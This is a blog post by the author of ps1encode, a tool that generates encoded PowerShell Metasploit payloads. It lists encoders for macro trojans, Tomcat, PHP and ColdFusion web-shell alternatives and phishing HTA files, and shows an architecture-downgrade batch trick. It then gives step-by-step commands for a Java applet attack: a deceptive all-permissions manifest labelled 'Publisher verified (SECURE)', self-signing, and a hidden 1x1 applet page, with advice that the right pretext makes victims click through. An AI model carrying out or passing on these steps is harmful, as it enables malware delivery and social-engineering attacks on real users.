I originally planned on writing this blog post after doing my DerbyCon 3.0 talk where I touched up on generating and encoding powershell based payloads. About a year later.. err… here it is 🙂  

Since then I’ve made a lot of updates so keep on reading for more details!

— NOTE —
Ps1encode is a tool I wrote that will generate and encode powershell based metasploit payloads. It relies on the powershell code written by Matt Greaber, Dave Kennedy, and few other contributors (the actual powershell shellcode injection piece). Credit to those guys for being awesome.

---

In order to determine system architecture in the original ps1encode, I used a simple change directory batch hack:

cd C:\Windows\SysWOW64\WindowsPowerShell\v1.0 >nul 2>&1 & powershell.exe -NoE –NoP….

If the directory where 32-bit capability version of powershell resides at did not exists, first line would fail out and script would continue executing in the native architecture. Meaning that system is 32-bit. While this worked, taking this approach became an issue when working with more complex encoders.

While investigating the best way to add in the downgrade logic to powershell , I ran across Dave Kennedy’s magic unicorn which does just that (https://github.com/trustedsec/unicorn < link – but python tho.. ew).  This version uses of ps1encode uses unicorn’s powershell one-liner shellcode injection code.

Help page:

Currently supported encoders are:

raw =>  base64 powershell code only without the run options
cmd =>  default payload – use with bat files or for an easy copy + paste + shell job
vba => for use with Microsoft Office products for macro trojans
war => for use with Apache Tomcat
exe => executable that will call out powershell and inject code into it. Requires MinGW to compile
java => for use with java applet attacks (details on this and the setup instructions later)
php =>  for use with PHP sites – an alternative to using web shells
hta => HTML Applications –  good alternative to executables in phishing campaigns
cfm => for use with Adobe ColdFusion. Similar to PHP, this is an alternative to using a web shell

---

JAVA
Below are the setup instructions for the java applet attack:

compile ps1encode java output
javac Java.java

add manifest
echo “Permissions: all-permissions” > /root/Desktop/manifest.txt
echo “Codebase: * ” >> /root/Desktop/manifest.txt
echo “Application-Name: Publisher verified (SECURE)” >> /root/Desktop/manifest.txt
jar cvfm Java.jar /root/Desktop/manifest.txt Java.class

self-sign it
keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass your1337pass
jarsigner -keystore mykeystore -storepass your1337pass -keypass mykeypass -signedjar SignedJava.jar Java.jar signapplet

copy to www directory (local apache for this example)
cp Java.class SignedJava.jar /var/www
echo ‘<applet width=”1″ height=”1″ id=”Java Secure” code=”Java.class” archive=”SignedJava.jar”></applet>’ > /var/www/java.html

Upon browsing our page the applet will load and victim will be presented with the screen below. While in the newer versions of java the warning message is more alarming, with the right pretext and a relevant application name (also ideally by having a valid code-signing cert) most victims should follow through.

You can download ps1encode from my github – https://github.com/addenial/ps1encode

Enjoy and hack hard!

Piotr Marszalik
@addenial